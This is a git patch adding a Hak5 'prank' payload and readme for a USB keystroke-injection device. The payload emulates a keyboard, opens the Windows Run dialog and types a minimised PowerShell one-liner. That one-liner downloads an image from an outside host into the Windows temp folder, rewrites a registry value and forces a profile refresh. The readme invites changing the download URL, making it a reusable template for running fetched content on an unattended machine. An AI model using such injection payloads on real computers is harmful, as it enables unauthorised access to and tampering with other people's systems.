From d386f07d8e09e549dcc8344cbb7773497631f574 Mon Sep 17 00:00:00 2001
From: Darren Kitchen <darren@hak5.org>
Date: Wed, 9 Jan 2019 10:58:36 -0800
Subject: [PATCH] Added wallpaper prank payload re: Hak5 episode 2502

---
 .../wallpaper-changer-of-doom/payload.txt      | 14 ++++++++++++++
 .../prank/wallpaper-changer-of-doom/readme.md  | 18 ++++++++++++++++++
 2 files changed, 32 insertions(+)
 create mode 100644 payloads/library/prank/wallpaper-changer-of-doom/payload.txt
 create mode 100644 payloads/library/prank/wallpaper-changer-of-doom/readme.md

diff --git a/payloads/library/prank/wallpaper-changer-of-doom/payload.txt b/payloads/library/prank/wallpaper-changer-of-doom/payload.txt
new file mode 100644
index 00000000..25d2a6c7
--- /dev/null
+++ b/payloads/library/prank/wallpaper-changer-of-doom/payload.txt
@@ -0,0 +1,14 @@
+# Wallpaper Changer OF DOOM!!!!
+# Author: Hak5Darren
+# Props: Alex Goat
+# Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo
+# Target: Windows Vista+
+# Category: Prank
+
+LED SETUP
+ATTACKMODE HID
+LED ATTACK
+Q GUI r
+Q DELAY 500
+Q STRING "cmd /C \"start /MIN powershell iwr -Uri http://h4k.cc/b.jpg -OutFile c:\windows\temp\b.jpg;sp 'HKCU:Control Panel\Desktop' WallPaper 'c:\windows\temp\b.jpg';\$a=1;do{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}while(\$a++-le59)\""
+Q ENTER
\ No newline at end of file
diff --git a/payloads/library/prank/wallpaper-changer-of-doom/readme.md b/payloads/library/prank/wallpaper-changer-of-doom/readme.md
new file mode 100644
index 00000000..c11adc01
--- /dev/null
+++ b/payloads/library/prank/wallpaper-changer-of-doom/readme.md
@@ -0,0 +1,18 @@
+# Wallpaper Changer of DOOM!!!!
+
+* Author: Hak5Darren
+* Props: Alex Goat
+* Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo
+* Target: Windows Vista+
+* Category: Prank
+
+## Description
+
+Single stage powershell one-liner executes from run dialog. CMD opens a minimized powershell window which downloads b.jpg (change this URL) to c:\windows\temp then sets the registry entry to change the wallpaper, then finally loops over an undocumented USER32.DLL feature for 60 seconds to force a user profile refresh.
+
+## STATUS
+
+| LED               | Status                                 |
+| ----------------- | -------------------------------------- |
+| SETUP             | Setting attack mode                    |
+| ATACK             | Injecting keystrokes                   |